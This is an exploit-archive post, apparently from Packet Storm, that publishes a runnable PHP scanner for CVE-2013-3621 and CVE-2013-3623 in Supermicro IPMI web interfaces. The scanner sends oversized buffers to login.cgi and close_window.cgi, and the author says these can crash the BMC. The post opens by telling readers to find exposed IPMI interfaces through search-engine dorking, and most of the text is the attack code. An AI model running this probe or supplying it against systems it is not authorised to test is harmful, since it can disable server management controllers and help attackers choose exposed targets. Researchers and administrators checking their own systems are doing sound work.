## https://sploitus.com/exploit?id=PACKETSTORM:189593
=============================================================================================================================================
    | # Title     : Supermicro X9 generation motherboards before SMT X9 317 PHP Vulnerability Scanner                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.supermicro.com                                                                                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Find exposed IPMI web interfaces by dorking in Google or another search engine.
    
    [+] Code Description: This code is a vulnerability scanner for the Supermicro onboard IPMI web interface (the ATEN-built BMC web UI). It checks for two known buffer overflows in that interface:
    
        CVE-2013-3621 - Buffer overflow in login.cgi: the code first sends a normal-sized username (20 bytes), then an oversized one (300 bytes).
    
        If the server answers the oversized request with HTTP 500 (Internal Server Error), the system is reported as vulnerable. This is a heuristic signature, not a working exploit; any other cause of a 500 will produce a false positive.
    
        CVE-2013-3623 - Buffer overflow in close_window.cgi: the code first sends a normal-sized sess_sid value (20 bytes), then an oversized one (132 bytes).
    
        If the server answers the oversized request with HTTP 500, the system is reported as vulnerable. Note that on a vulnerable device the oversized request can crash the BMC's web server, so this is an active and potentially disruptive test.
    
        How does the code work?
    
        Verifies that the target is a Supermicro IPMI web interface by checking the home page for the string "ATEN International Co Ltd." (isSupermicro).
    
        Checks the login.cgi vulnerability by sending a short fixed username followed by an oversized one (checkLogin); the data is a fixed run of 'A' bytes, not random.
    
        Checks the close_window.cgi vulnerability by sending a short sess_sid value followed by an oversized one (checkCloseWindow).
    
        Displays the results: a warning line is printed for each vulnerability detected.
    
        What is this code for?
    
        Helps security researchers discover systems vulnerable to these vulnerabilities.
    
        Can be used in penetration testing to verify the security of Supermicro IPMI devices.
    	
        Administrators can use it to verify that their own systems are not vulnerable. Because the oversized requests are crash probes, run it only against systems you are authorised to test, ideally during a maintenance window.
    	
    	
    	( Related : https://packetstorm.news/files/id/181154/  Related CVE Numbers: CVE-2013-3621, CVE-2013-3623 )
    	
    [+] save code as poc.php.
    
    [+] Set the target: line 92 of poc.php (the `new SupermicroIPMIScanner('192.168.1.1')` call).
    
    [+] Usage : php poc.php
    
    [+] Payload :
    
    <?php
    
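    class SupermicroIPMIScanner {
        /*
         * Scanner for two 2013 buffer overflows in the ATEN-built Supermicro IPMI web UI:
         * CVE-2013-3621 (login.cgi, "name" parameter) and CVE-2013-3623 (close_window.cgi,
         * "sess_sid" parameter). Each check first sends a short value to confirm the CGI answers
         * normally, then an oversized value; an HTTP 500 on the oversized request is taken as the
         * vulnerable signature. This is a heuristic, not an exploit: any other cause of a 500 is a
         * false positive.
         *
         * WARNING: the oversized requests are crash probes. On a vulnerable BMC they can take the
         * web server (and possibly the BMC) offline. Only run this against systems you are
         * authorised to test.
         */

        /** Seconds allowed for the TCP (and TLS) connect before giving up. */
        const CONNECT_TIMEOUT = 10;
        /** Seconds allowed for a whole request; a BMC that just crashed may never answer. */
        const REQUEST_TIMEOUT = 20;

        /** Outcomes returned by the per-CVE checks. */
        const RESULT_VULNERABLE = 'vulnerable';
        const RESULT_NOT_VULNERABLE = 'not vulnerable';
        const RESULT_INCONCLUSIVE = 'inconclusive';

        /** Host or host:port of the BMC, optionally prefixed with an explicit scheme (e.g. https://). */
        private $target;

        /** curl error text of the most recent transport failure; '' when the last request got a response. */
        private $lastError = '';

        /**
         * @param string $target host, host:port, or a full origin such as "https://10.0.0.5".
         */
        public function __construct($target) {
            $this->target = $target;
        }

        /**
         * Build the origin the requests are sent to.
         *
         * An explicit scheme in $target is kept as given; otherwise plain http:// is assumed, as
         * in the original scanner. NOTE: with https curl verifies the server certificate by
         * default, which the self-signed certificates on most BMCs will fail; point CURLOPT_CAINFO
         * at the BMC's certificate rather than disabling verification if that matters.
         *
         * @return string origin without a trailing slash
         */
        private function baseUrl() {
            if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $this->target) === 1) {
                return rtrim($this->target, '/');
            }
            return "http://{$this->target}";
        }

        /**
         * Issue one HTTP request against the target.
         *
         * @param string $uri      path starting with "/"
         * @param string $method   'GET' or 'POST'
         * @param array  $postData form fields, url-encoded when $method is 'POST'
         * @return array ['body' => string, 'code' => int]; on a transport failure (refused, reset,
         *               timed out) the body is '' and the code is 0, and the curl error text is kept
         *               in $this->lastError.
         */
        private function sendRequest($uri, $method = 'GET', $postData = []) {
            $url = $this->baseUrl() . $uri;

            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            // Without timeouts, a BMC whose web server died on the trigger request hangs the scan forever.
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, self::CONNECT_TIMEOUT);
            curl_setopt($ch, CURLOPT_TIMEOUT, self::REQUEST_TIMEOUT);

            if ($method === 'POST') {
                curl_setopt($ch, CURLOPT_POST, true);
                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
            }

            $response = curl_exec($ch);
            $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            $this->lastError = ($response === false) ? curl_error($ch) : '';
            curl_close($ch);

            if ($response === false) {
                // No status line was read: keep the body a string (never false) so the strpos()
                // callers stay well-defined, and report code 0 so callers can tell it apart from 500.
                return ['body' => '', 'code' => 0];
            }

            return ['body' => $response, 'code' => $httpCode];
        }

        /**
         * Fingerprint the target: the ATEN web UI front page carries the vendor string.
         *
         * @return bool
         */
        private function isSupermicro() {
            $res = $this->sendRequest("/");
            return ($res['code'] === 200 && strpos($res['body'], "ATEN International Co Ltd.") !== false);
        }

        /**
         * Classify the reply to an oversized (trigger) request.
         *
         * @param array $res result of sendRequest()
         * @return string one of the RESULT_* constants
         */
        private function classifyTrigger($res) {
            if ($res['code'] === 500) {
                return self::RESULT_VULNERABLE;
            }
            if ($res['code'] === 0) {
                // The BMC stopped talking mid-request. That is consistent with the process crashing,
                // but the 500-based signature cannot confirm it, so do not claim either way.
                return self::RESULT_INCONCLUSIVE;
            }
            return self::RESULT_NOT_VULNERABLE;
        }

        /** POST a sess_sid value to close_window.cgi. */
        private function sendCloseWindowRequest($session) {
            return $this->sendRequest("/cgi/close_window.cgi", 'POST', ['sess_sid' => $session]);
        }

        /**
         * CVE-2013-3623: oversized sess_sid in close_window.cgi.
         *
         * @return string one of the RESULT_* constants
         */
        private function checkCloseWindow() {
            $safeCheck = str_repeat('A', 20);
            $triggerCheck = str_repeat('A', 132);

            // Baseline: a short sess_sid must yield the normal "Can't find action" page; otherwise
            // this is not the expected CGI and a 500 on the trigger would mean nothing.
            $res = $this->sendCloseWindowRequest($safeCheck);
            if ($res['code'] !== 200 || strpos($res['body'], "Can't find action") === false) {
                return self::RESULT_INCONCLUSIVE;
            }

            $res = $this->sendCloseWindowRequest($triggerCheck);
            return $this->classifyTrigger($res);
        }

        /** POST a username (with a dummy 4-byte password) to login.cgi. */
        private function sendLoginRequest($name) {
            return $this->sendRequest("/cgi/login.cgi", 'POST', [
                'name' => $name,
                'pwd' => str_repeat('A', 4)
            ]);
        }

        /**
         * CVE-2013-3621: oversized "name" in login.cgi.
         *
         * @return string one of the RESULT_* constants
         */
        private function checkLogin() {
            $safeCheck = str_repeat('A', 20);
            $triggerCheck = str_repeat('A', 300);

            // Baseline: a short bogus login must come back as the normal failed-login page
            // (vendor banner plus the reload script) before the oversized value is sent.
            $res = $this->sendLoginRequest($safeCheck);
            if ($res['code'] !== 200
                || strpos($res['body'], "ATEN International Co Ltd.") === false
                || strpos($res['body'], "top.location.href = location.href") === false) {
                return self::RESULT_INCONCLUSIVE;
            }

            $res = $this->sendLoginRequest($triggerCheck);
            return $this->classifyTrigger($res);
        }

        /**
         * Print the outcome of one check. The "Vulnerable to ..." line is unchanged from the
         * original output; the other two lines make "nothing found" distinguishable from
         * "could not test".
         */
        private function report($label, $result) {
            if ($result === self::RESULT_VULNERABLE) {
                echo "Vulnerable to {$label}\n";
            } elseif ($result === self::RESULT_INCONCLUSIVE) {
                echo "Inconclusive for {$label} (unexpected baseline response or dropped connection)\n";
            } else {
                echo "Not vulnerable to {$label}\n";
            }
        }

        /** Fingerprint the target, then run both CVE checks, printing progress and results to stdout. */
        public function runScan() {
            echo "Checking if it's a Supermicro IPMI web interface...\n";
            if ($this->isSupermicro()) {
                echo "Supermicro IPMI web interface found\n";
            } else {
                echo "Supermicro IPMI web interface not found\n";
                if ($this->lastError !== '') {
                    // Distinguish "not a Supermicro BMC" from "could not reach the host at all".
                    echo "Request failed: {$this->lastError}\n";
                }
                return;
            }

            echo "Checking CVE-2013-3621 (login.cgi Buffer Overflow)...\n";
            $this->report('CVE-2013-3621 (login.cgi Buffer Overflow)', $this->checkLogin());

            echo "Checking CVE-2013-3623 (close_window.cgi Buffer Overflow)...\n";
            $this->report('CVE-2013-3623 (close_window.cgi Buffer Overflow)', $this->checkCloseWindow());
        }
    }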
    
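    // Target comes from the first CLI argument (php poc.php <host[:port]>); the literal below is the
    // fallback and is what to edit if you prefer to hard-code the target address.
    $target = isset($argv[1]) ? $argv[1] : '192.168.1.1';
    $scanner = new SupermicroIPMIScanner($target);
    $scanner->runScan();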
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================